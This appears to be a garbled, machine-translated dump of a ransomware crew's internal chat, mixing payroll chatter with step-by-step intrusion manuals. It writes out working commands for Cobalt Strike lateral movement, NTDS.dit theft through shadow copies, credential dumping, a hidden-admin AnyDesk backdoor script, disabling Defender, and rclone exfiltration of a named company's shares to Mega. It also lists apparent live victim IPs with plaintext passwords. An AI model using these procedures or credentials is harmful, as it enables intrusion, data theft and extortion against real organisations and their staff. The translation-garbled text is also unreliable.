What kind of mailing? Is there a mailing list or something?I had a problem with the car, I had trouble restoring it, I had to go back to the car, but I had to go back to the car. I had a problem with the car, all restored. At work, I get into, twin not too lazy, detailed manuals pouredvnikayut work ?Hi there mango lost you @all Hello! Who did not get wages - send in a personal account wallets, the evening will be all! vampiret scripts and description for cobalt, but do not need to yuse them on the cob, the session goes to the slip for 300 sec@jumbo download ``https://www.sendspace.com/file/qwjl9c Archive password: popo99 here's cobalt 4.3 This is how we ping hosts. Create on your desktop TXT FILE named domains.txt 2. YOU HAVE SORTED OR JUST LOCAL COMPUTER NAMES PUT THEM IN THIS FILE 3. FILL YOUR MACHINE (C:ProgramData) WHICH WILL PING FILE domains.txt and p.bat 4. ENTER p.bat by using shell command 5. After pinging download res.txt file. The scripts above are for cobalt, please don't use them when on a shared cob. + I will tell you another point about ad_users, there is a lot of information about employees, there you can find technicians, engineers, etc. We usually need ad_users when we want to find admin's car, because on admin's cars we can find passwords from antivirus console, from cloud backups and so on. Now I will send you the USERCHANTER manual, with it we find these cars. Just ad_users, we need to get there SID, for golden ticket, but about this later 1. Make a list of tags 1.1 Open admin_users , find out who we are potentially interested in: admin / engineer / IT Get the account logins from sAMAccountName 1.2 Get the list of domains admins 1.3 put the first and the second in the file list.txt 2. aploat the powerview. 
2.1 powershell-import _/home/user/soft/powerview/view.ps1_ 2.1 -comment: import powerview from /home/user/soft/powerview/view.ps1 2.3 Hunting 2.3.1 psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt instead of 1884 - the PID of the process where we have enough rights to inject. x64 - or x86 bitrate of the process. see in the tasklist In cprogramdata\list.txt should lie the list that we did in point 1. In 5-10-20 minutes you should see the result in out.txt. If the file is 0 bytes then either AB has hit it (if AB has hit it, you will see it in the cob) See who is working with the database (hosts and users from where you connected to it) shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses" 1. Display all databases on the server in kmd shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;" with size in megabytes shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;" 2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRCHOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 2.1. 
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 3. Counting rows in a specific table of a specific database sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;" 4. Unload the first 10 records in a specific table of a specific database sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;" sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W 5. Search by column names in a specific database using %pass% as an example sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';" 6. Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt" FULL > sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt" 7. 
Output all tables of a particular database shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W for remote/other local server change localhost to ip,port alternatively localhost,%port% (watch netstat) If a table or database is named with 2-3-4 words - then it is escaped like this [%databasename/tablename%] sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK='d:\adw.bak'" ``Good stuff, I recommend it,`` AnyDesk - read all about it. Function AnyDesk { mkdir "C:\ProgramData\AnyDesk" # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "http://download.anydesk.com/AnyDesk.exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password net user oldadministrator "qc69t4B#Z0kE3" /add net localgroup Administrators oldadministrator /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id } AnyDesk Running the code in Powershell ISE Run As Admin Get ID We save it to ourselves We download Anydesk on a separate virtual desktop and give it an ID. Press Console Account Enter password Quote J9kzQ2Y0qO And then log in with a local administrator or domain account and take advantage of Anydesk You can also download/download it to the victim's machine, which can be useful for examining and searching documentation point by point. ``````Get access to the server with Shadow Protect SPX (StorageCraft) backups == 1. RDP access to one of the servers, in my case it is a SQL server. 2. On the desktop, we see the ShadowProtect SPX icon -> click on it. 3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software) 4. 
On the left side in the "Job Summary" block you will see the detailed description of backup scheme In the "Name" field - backup name of our server in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE) From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself. 5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied". 6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges 7. Let's assume that if it is a dedicated user, he has a similar name to the software/function: we go through the logins with substrings (here we need to get fancy): Storage Shadow Protect Craft SP SPX Backup BUUser ETC. then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.) 8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server. 
Try to dump hashes Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar) In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos: * Username : SPAdmin * Domain : COHBackup * Password : Backup!User (in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value)) 9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access 10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup === `````` add firewall rules New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow # add to registry new port Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350 # powershell Restart-Service termservice -force Changing RDP port ``````Installing a metasplot on the VPS 1 apt-get update apt-get install curl apt-get install tmux apt-get install default-jdk apt-get install postgresql apt-get install nano apt-get install gpg curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall ./msfinstall 2 then open nano /opt/metasploit-framework/bin/msfdb find and comment on these lines # if grep -q kali /etc/os-release; then # echo "Metasploit running on Kali Linux as root, using system database save CTRL+O msfdb 
init ``LittleBig1) Script for collecting balls 2) Script for gathering kerberos 3) Script for hunching admins above adfinder, for collecting ADscript for sorting ADallias for metasploit above ``TG forum list, lots of interesting stuff ``````Some way to Dump NTDS without getting dirty shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt" query the shadow listings, there is a date, check if it is a recent date. They're almost certainly already there, if not, we'll do it ourselves. net start Volume Shadow Copy shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1" then in the Shadow Copy listing find the most recent one Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55 respectively we need the copy number for the following command shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\?
ntds.dit / security / system files should fall into c:\temp\log\ take the portable console 7z and pack it in the archive with password Code: 7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD download the password-protected archive to yourself, if you get an error (the file is corrupted) when decrypting the ntds file, then do the following Esentutl /p C:\log\ntds.dit the trick of this method is that we do not actually dump anything, we just take and download the ntds so we don't get caught pulling out the ntds we pack it in a password protected archive If you have a problem with being burnt and kicked off the network after a ntds dump, try this method it is possible to burn only by the fact of some leaked date from cd, and it is impossible to analyze what exactly you take without knowing the password from the archive `````` a stack of manuals on raising rights, for those who don't know English translate here deepl.com github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet ``````1. YOU HAVE FACE res.txt, OPEN IT IN NOTEPAD++ 2.PRESS CTRL+F IN THE SEARCH BOX AND TYPE TTL 3.HIT FIND ALL IN CURRENT DOCUMENT YOU WILL SEE A WINDOW WITH IP AT THE BOTTOM 4. go to en.toolpage.org/tool/ipv4-extractor THEN paste everything you get and get a clean ip ``````How to sort collected AD from the net 1) Download FileZilla 2) Download Putty, put Putty through the torus Go here torproject.org/download/tor/ Download the WARNING Expert Bundle Unzip it, go to the Tor directory and run tor.exe In a few seconds it will reach the message 100% Done In Putty settings, go to proxy, set SOCKS5, IP 127.0.0.1 port 9050 3) Go to the server via FileZilla > go to the directory "Script" - put next to the script AD files 4) Switch to Putty, go to the server, go to the directory where the script is, give the command ./script.sh 5) Finished, go back into FileZilla and take our sorted out.
Be sure to remove the AD files and the sortertad folder after yourself, if the sortertad folder is not removed, just change it to whatever name you want `````` HOW TO JUMP THROUGH SESSIONS WITH PAYLOAD Commands to run peloid, to pull up the session in cobalt 1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00 2) shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15" 3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F instead of MS040926754153 put in ipac run through the commands one at a time 1) creating a ride with paiload 2) turn on 3) deleting Running VMICOM we use it more often 1)If it is a dll, then shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW" Accordingly, where ipi, insert the ipi of the machine on which we have access, then comes the path and the name of our dll, I think the syntax is clear If you are on RDP > open CMD as administrator and rundll32.exe C:\ProgramData\x64.dll,StartW you can specify any path according to where your dll is For EXE format or .bat format, running VMICOM is like this shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe" I'll fill it in later. I'll list everything at once ``How to download and what info 1) After we raised the rights, found the Admin Domain, we pull the sesi into the cobalt 2)We put the YES token on and Remove the balls this way : *powershell-import - we upload ShareFinder there as usual and give the room the following - psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt Next, we study the balls that were taken, and we're interested in *Financial documents * Accounting *Ity *Customers *Projects And so on, it all depends on what our targeting is doing. 
Next we do the following > here is the Diablo Manual, everything is easy to understand and understand Rclone to start downloading through rclone you need to create a config to create a config open cmd go to the directory where rclone.exe is Run rclone.exe with the command: rclone config choose from the menu new remote call it mega and enter mega once more after that we typed the mega mail address after it will ask for a password to enter or generate we will choose yours with the letter 'Y' the password won't show up on insertion but it's still there after creating the config you get thrown back to the main menu and you get out of the rclone. then enter the command rclone.exe config show it will show the config copy it and create file rclone.conf where we put this information. when we found the balloons we download the exe and the config to the target machine with the rights to hide the config and the exe so they will not be found go to the exe directory and give the following command: shell rclone.exe copy "\\envisionpharma.com\IT\\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 where: \envisionpharma.com\IT\KLSHARE are balls Mega:Finanse is the location of the files in the mega (can create a folder in the mega on its own) streams 12 --transfers 12 is the number of streams that pump to the maximum (12) is not recommended because you can easily get caught shell rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - here is an example in this case on FTP !!!RKLON ITSELF WEIGHS ABOUT 50MB, THE LINK TO IT WILL BE BELOW THE POST!!! 
`````` GO TO AGENT: RIGHT-CLICK ON AGENT AND PRESS INTERACT 1) see the list of shell net group "domain admins" /domain 2) domain name shell net view /all /domain 3) LIST the DC shell nltest /dclist: "NameDomain" 4) CHECK THE LIST OF SERVERS INSTALL THE PowerView MODULE RIGHT-CLICK on the Get Info > Get Servers Agent GET LIST OF SERVERS 5) SEE THE LIST OF COMPUTERS AS THE PowerView MODULE IS ALREADY ENABLED RIGHT-CLICK on the Get Info > Get All Computers Agent GET LIST OF COMPUTERS 6) YOU NEED TO FIND OUT PASSWORDS OF ALL DOMAIN ADMINS RIGHT CLICK ON AN AGENT CLICK ACCESS > DUMP HASHES GO TO VIEW > CREDENTIALS GET ALL HASHES AND LOOK FOR DOMAIN ADMINS 7)WE NEED TO FIND NAS , BACKUP THIS IS THE COMMAND WE KNOW ALL SUBNETS OF THIS DOMAIN THIS COMMAND FIND OUT AT WHAT IP ADDRESS IS NAS , BACKUP portscan 107.191.177.1-107.191.177.255 5000 icmp 1024 A LIST OF USEFUL COMMANDS THAT MAY COME IN HANDY: Remove AGENT RIGHTS BEFORE DEFOLST rev2self. turn on the user via the CMD shell net user careadmin /active:yes USER INFORMATION shell net user careadmin /domain Turn ON RDP CONNECTION shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control_Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f DISCONNECTING DEFENDER powershell Set-MpPreference -DisableRealtimeMonitoring $true POLICY REVIEW shell repadmin /syncall /AdeP SHOW HOME TRUSTS shell nltest /domain_trusts /all_trusts shell wmic /node: "PC NAME" process call create "COMMAND TO DO" `````` INITIAL ACTION 1) Unchecking AD - allows us to see how many servers and workstations are on the network, as well as information about users and their positions, and after unchecking AD we sorted it in order to sort out only what we need - we will show it to you later 2) The sharfinder is a way to determine where we have access to this user (to other computers). 
3) Kerberos attack - pulls hashes from memory, if successfully removed and successfully decrypted - we are guaranteed domainAdmin 4) If we have system rights, with the command "hashdump" and "logonpasswords" we can pull hashes and mimics and we will have the password of a domain user, and sometimes even the domain admin 5) If we have found a login and hash of the admin domain and we have not been able to hash, we do the following command pth Domain\Admin pass (as hash), using the command shell dir \ip or hostname\c$ we check access to the server or workstations 6) If we find the login\pass domain of the administrator or user, we can put his token, the command looks like make_token Domain\Admin Pass , if you want to remove the token, the command rev2self 7) If the session has a process system , with the getsystem command you can raise the system rights in the session, point (4) 8) Do not forget to watch the processes with the command ps, there you can find the user, migrate to his process > Explore > Process list > then select the user process (the user must be different, not the one in the session) and press inject, select the SSL listener 9) After migrating to the new user you also need to remove balls to see where you can break through with it. 10) When you remove the balloons, at the end of the removal of the directory C:\ProgramData and there is sh.txt or shares.txt, download it and see how many "remote admin" in the textbook, if there is more than one, it means that you have access to another computer 11) Click on session > File Browser > write path\ypie or hostname of the computer you have access to\c$ , put there peloid, I will give it to you later 12) Launch the package depends on its format eh or dll, I will explain later personally 13) To ping the server and workstation, we need p.bat, I will throw it in the group. Create a txt file, call it domains.txt, put there hostnames servers or minutes. 
Hostnames are taken from the withdrawn AD, with the script, they will show how to use 14) If you found a password, you can also run it through smb_login - an instrument in metasploit, I will give a metasploit and tell you how to use it. smb_login will show which servers or woks, have access to these scripts ``Manuals_team_Boyfriends who did not get the weekend zp write to pmbudet*she all budtrebyatki who I get zp send walletsPrietPrivet viemprivetperevet🖐privetprivetnetmanPrietPrivetprivetvsvsvetgorec_SupportgorecHi all! Guys who are newly connected to the chat - send in pm their backup jabbers in case the rocket gets tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Armitage Teamserver Setup by Graf 1. Install the metasplot curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall ; ./msfconsole run the metasplot 2. Install Postgresql apt-get -y install postgresql 3. Installing and unpacking Armitage wget http://fastandeasyhacking.com/download/armitage150813.tgz tar zxvf armitage150813.tgz 4. Create a user and give him sudo rights adduser %username% usermod -aG sudo %username% 5. Initialize the metasplot database from the newly created user and export MSF_DATABASE_CONFIG with the .yml address obtained during initialization msfdb init ; msfdb reinit - Deletes and reinitializes the database. ; msfdb delete - Deletes the database. ; msfdb start - Starts the database. ; msfdb stop - Stops the database. ; msfdb status - Shows the database status. export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml 6. 
Launch Armitage Teamserver cd /path/to/armitage ./teamserver [external IP address] [password] Useful Links Installing the Metasploit Framework - https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/ Armitage installation - http://www.fastandeasyhacking.com/manual * This guide assumes that you already have experience working with *unix systems and you will be able to deal with difficulties arising in the process. Write to pm for life, @all guys, is there anyone sitting on a fresh cob? Go to me for nets. If you have a clean cobaltjohnnuggetsribe donald, opishee pm how will youribe donald, opishee pm how will youdonaldWell, you can send in pm purse and the amount in bets to pay:) and your duties (coder, admins what project, etc in short) All Hello! Guys, today / tomorrow payroll, so who recently started - send in a personal note the date from which you work, external backup gibber and who is your team lead. Who is not in the list - wages will not get:) Happy Monday to everyone :) otherwise there will be confusion. Guys, under team leader, put me Hello Something new, if we have our internal toad - it too so please all these citizens to send me in the PM your nickname, external jobber (any public will do, as a backup means of communication, in case the rocket breaks), who's your team lead and from what date work I will give salary to those of you who wage all local@all guys who have not received zap yet write in the personal message please super!)@all Hello All, send wallets in a personal message for wages. Those who receive wages from me :) @all Hello, everyone who zp I get - write in the personal kosh@twin bros are you going to work? I have a lot of things to tell you about my work, but I have to tell you in person. vnjSxzeBkX8N4kJ2y2VgNoLhwx1u8q34G8Ibnh27E2h0leAvJzPlCuOxENCbVw50 ``Nation, need new servers koba and not only, the old cuts the traffic. Who to order from? Hey bro, on the zp have any info? @all Hi all! 
who gets zp from me - write in person kosh+senku bro, study@all gang, study conf conf conf manualsvampirLittleBigjumbotwinall Hi! Sorry for the delay, who online - write in person on the zp "it's all coming up" (s)+forum wars cheating and everything about the pub - we all do not care, friends, watch yourself, the train can come for anyone who does not think with his head, remember how you read other people's mail - they can read, and you're sorry for the "orderly tone" but this isn't a telegram channel for little hackers I hope everyone understands. It's not our topic. We've forgotten. "Chocolate is not to blame "period.I STRONGLY recommend that I write to pm if there are people here who were the adverts of the software, stop right here and now the discussion of this event + Yes, the news is one thing, and what is there in practice is not clear yet yoyu interview with them where they said that I have access to nuclear missiles. Well a lot of red lines were crossedRevil is partner software, where a lot of people localize what comes into your headDon't worry, everything is fine. All the best to you and your loved ones and most importantly health and happiness, and we'll steal more money. If anyone wants to work on the yng, i'm here for the holidays, there are cases) after the holidays will be a global updatd here all of us and more will guys who have cobalt crypto at hand? pick up the targetet it only for our so understoodmrFlintstoneeldoradografalexspoonsonarstakantwinpiperryfuryAir guys do we have a rocket that starts with https://6yp ? In torey who has armitage ? share the plies and then their off site is lyingDi11erHi all guys who have recently joined the chat - send in pm their backup jabber in case the rocket will get tired, so as not to lose anyone. Just need the number from which work, who's team leader and what to pay agreed to. Thank you! Hi, I could not get into this chat, reverse helped, now all is wellHow are you doing? 
Hi@all now this one is pulling https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918 Revenue: 2kkk 98.174.166.162:10443 MelissaDunkle : Rose2016 DougClagg : Kaelynlyn1 If you can't tomorrow afternoon, let's see what you're doing wrong, try it again. you have a virtual computer on the deck, just do not knock, no error and on it raise the VPN and the virtual computer with the bridge Deploy the virtual computer as it should on the virtual computer and what she writes it does not come?we can't get it from there and we can't send it to the coba so raise the VPN on the virtual desktop and raise the VPN on your virtual desktop, everything is ok, even on http does not let on the web i will think of something either today or tomorrowWhy, i'm busy now i'll send you the heloide here Let me do it from mineTried to create a virtual machine on the rods, the same situationvpn up, the rods are not pulling The rods are not pulling to the kobaNo jumped?and how's it going? @twin where's the channel? 3. https://www.zoominfo.com/c/Wyndham-hotels-resorts-inc/117882918 Revenue: 2kkk 98.174.166.162:10443 MelissaDunkle : Rose2016 DougClagg : Kaelynlyn1 4. https://www.dnb.com/business-directory/company-profiles.autopistas_del_sol_sa.92b12328da08fa19d4c395e60f909f75.html 200.105.84.66:10443 avillaverde : ViniciuS2020$ avillaverde : ViniciuS09$ ``Friends, who has a Windows 7 image? Hi guys, who recently started - send a date in the personal list, with which you work, external backup jabber and who is your team lead, And your duties (coder, admin what project, etc. in brief)Ііq51B↩vidtautorvalte guys share juxtaposition in pm pliz)brusshelsheskurrivet:metal:we are a legion)and we are more and more, I ooooochee like it:zany_face:Hi)¼argauWell, hello! Send a purse and the amount of btz to zp in pm! dark@all brothers for technical reasons zp postponed to the IPA. Please do not worry, the IPA will be all ironclad, hang BTC, and since the weekend ahead - most likely to postpone the IPA. 
If anything comes before then I'll let you know right away. If it comes tomorrow - I'll be in touch all weekend! I have not heard anything for a long time, ask mangostevenWho's your team leader? maybe know what the lull? click@alter @steven @Air oursaga )LittleBigstickjumbo Happy New Year, colleagues! Vas toze vsech s nastupaeshim !!))`) HAPPY NEW YEAR !!! I WISH YOU HEALTH, EVERYTHING ELSE WILL BUY ! Happy New Year to everybody! I want to wish everybody the best, and most importantly health to you and your loved ones. And that everything goes up - from rights to you know what)))) Happy New Year to all. And by the way - there are cases) go to the coba who would be bored) With a Happy New Year!!! All the best in the new year!! With a Happy New Year everyone! Good luck to all.klaxonprizrakaga )+respect cryptorukpt good everything flies without a problem then there will be confusion ``. Guys, in the teamlead box, put me If there is our internal toad - its too,ask all such citizens to send me in PM your nickname, external toad (any public will do, as a backup means of communication, in case the rocket breaks), who's your Team Lead and from what date work I will issue wages to those of you who are on salary to all local guys who are in touch send wallets in privatedobavim@Air @steven do not forget to throw in the confab, again I see that the confab is, but I'm not in it) completeportables.com ? I don't see a case like that@all ``` ZI3Qfg81dEJOrKaNwID6EKW799vXK105jxI2jZIKpitmcf7f6hbqEkxtKqZhudV ``` Who is it? Peace to all local:nerd:All new joiners need to unsubscribe me in person so I put you on the balancevshe Hi! Bros plan to pay either tonight or tomorrow, as will be the news I myself otpisuyut all) and your duties (coder, admin what project, etc in short) All Hey! Guys, today / tomorrow pay, so, who recently started - send a date in a personal letter, which work, the external backup gibber and who is your team lead. 
Who is not in the list - wages will not get:) All have a Monday :) klahonvirtulku pickupparni how to remove the hell if the av just immediately rubs files in progodate. av - santinel. targeting at 8kkk) is there anyone to help?) ok all found all spsdlya stop what services need batinok? @all give batik to stop services plyz!!mangomne need to go away for 1-2 hours and will be until morningfiksanem otpisuyu so far fixingparni files through sendspacevampirLittleBigstickjumbo after the holidays will be a global updatd here all of us and still willparni who has a cobalt crypto at hand? pick up should targetetetetet only for ours I understandmrFlintstoneeldoradografalexspoonsonarstakantwinpiperperryfuryAiralterstevenadmin_IRYmQv2EnHjaxtesttesttest_uplodarbakadonaldAll hello! I can send in pm purse and the amount in bets to pay :) Hi, who gets my zp write in personaliiloparni who have not received in the weekend zp write in pmpantsantra, if you need decrypts hashes hiding passes and you need ClearText you can apply ... I own a modest farm for Hashcat on 2xRTX2080Super. I will be glad to help you. ( Hash - NTLM/SHA1/MD5/NTLMv2/DCC2/... example result YourHash:Password 0edca1229618638065b944e8b8fc6b7e:dadandmum18 a0d31f5b27ec38230c4d4810b7a62684:Astrology1@ a50e613d30c6f5b3b7d923349328fc3b:akusayang08 ) RanXerox, Send me a Fax, use RanXerox! HiHELLOU to all of you!!! martinloveok in an hour we will come to look at the load there is installed there fortyclientaga okSOVA://209.222.101.242:64132 P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm139 298 679|qp48ihqq - ıtvıverlıtem cobu access and tym on ddik putin 7 or 10cu on ddik virtualku liftDo, we can not pull up to cobu jump?let's try what ?www.wyndhamhotels.com_TEAM_СС new 2022 !!! 🥳:grin: :v: :grin:Happy New Year, survivors))))) also on the car is logmeaga and as the weather closes the client and go to@eldorado you have another write back I write you in the torus no luck?
search for the key name of the user and you? Brother, what is it with you and have a script in the cob that would pull it off?the registry I understand, but where on the machine is the file where it is stored and steven, I need you on another topic )))) it stores if there is a tick to remember on the connection does anyone know if WIN7 stores passwords somewhere from the connection? yes those lumineers lard? domain is there) yes it would be logical so where to get the username and passwords so they domain probably asks the creeds) 0_0create) VPN connection creates?let me see the config in the windup directly into the connection where to import? there is no client it importsnu let me see the config let me see there is a key, no crid) o_o I still spied it az com)? i missed something so what kind of VPNN wrote tebeklient no, there is a script + batnickam just a VPN imported into the connectiona very large conkrito write to the toad@eldorado what kind of VPN client?there are a number of questions, how to enable keylogger. where in win 7 are stored passwords from VPN connection. serts stolen, need to get passwords and is it possible? preferably immediately the amount and kosh :) hi All! Who gets my salary - write in person :) _Patsantre_ , well, what's the zoo? Who taught you how to read? I'm a kind, good guy who allows you to use cheats, i.e., to chase your Hash on my GPUs and dictionaries, which don't take five minutes to compile... Just one thing, please don't complicate my work.... If NTLM, NTLM and Md5/sha1/\'some us\'... `FORMAT user hash ``` MD5 aperia 4c1874760fb49ebdabadd6cc4232ed7b1 NTLM miriam 669bfafdb4990fe1c953f8ac5a15586d SHA1 luke 8a233d0252d2c659b3a26cf4cf25d59d409615ab ``` And here's the kicker - it's DCC2 (I fucked them!) 
`$DCC2$10240#techpilonm#a056cd163d1edf16d4827d2b0dd5945a:%TGB4rfv` Here are the speed stats: ``` MD5 80696.7 MH/s [ 84616622899 tries/sec ] Sha1 26210.2 MH/s NTLM 134.0 GH/s DCC2 1044.4 kH/s BitcoinWallet 17111 H/s [ 17111 attempts/sec ] ``` If I still have to chase that config does not brute force something because again MD5, I think it's a shame. *** [serviceman's voice](https://hashes.com/en/tools/hash_identifier) Go in, check it out, throw.... Ah site is also provided with their database piercing service... ([Decrypt](https://hashes.com/en/decrypt/hash) like to call it) _here's more `https://crackstation.net/` `https://md5decrypt.net/en/Ntlm/` `https://md5decrypt.net/en/` `https://md5hashing.net/hash` `https://www.cmd5.org/` [Cloudtopolis - if you want to fuck with me](https://github.com/JoelGMSec/Cloudtopolis) So # ATTENTION !!! FORMAT user hash sps@twin how's it going ? Hey everyone, the plan is to ST tonight / tomorrow morning, as soon as - I will immediately write to all. Please have a little patienceinvictussmokeNeed a clean coba - targetets 1kk and250k now online
cpPudgesubzerojaxtesttest_uploadbarakaSaulGoodmanpopulyaet rolled back the OS ne terayte skoro buduu I do not have big trabla in ls sent@all hello all, who has an image of Windows 7? Pudgesubzeromango me to go away for 1-2 hours and will until morningfiksanempisyat for now fix files via sendspacevampirvampir. All in all good, just restoring all the data. My computer fucked up, I'm transferring everything to a new one. It should be ready in the morning. Anything to do? Hi, how are you? I'm joining you, Happy New Year to all, all and more in the New Year and less trouble!) Happy holidays to you, men! Let everything go as planned)Happy Holidays to all! May our wishes come true!!! Happy New Year to all, may the next year make all expectations come true✊🏼Welcome greetings!!! May things get better in the new year. A firm handshake! +++ Happy New Year )Happy New Year, men:innocent:Happy New Year to you all, Bro!!!:snowman2:Happy New Year to all, we will find you in the new year :)@all Hey there! Happy New Year to all! Who gets my salary - write to me in person :) https://xakep.ru/2021/06/25/windows-ad-book/SaulGoodman ``OK``.
